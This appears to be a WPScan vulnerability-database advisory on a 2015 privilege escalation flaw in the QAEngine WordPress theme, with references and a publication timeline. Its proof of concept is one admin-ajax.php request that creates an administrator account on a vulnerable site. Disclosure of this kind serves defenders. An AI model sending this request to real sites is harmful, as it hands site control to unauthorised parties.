QAEngine Theme - Privilege Escalation



Description
QAEngine vulnerability allows an attacker to have an administrator account on the target's website.
Proof of Concept
http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator

Affects Theme

References

PACKETSTORM 131648
URL http://web.archive.org/web/20150912144515/http://research.evex.pw/?vuln=10

Classification

Type BYPASS

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 1059
Verified No
WPVDB ID 7885

Timeline

Publicly Published 2015-04-06 (over 3 years ago)
Added 2015-04-07 (over 3 years ago)
Last Updated 2016-04-24 (over 2 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.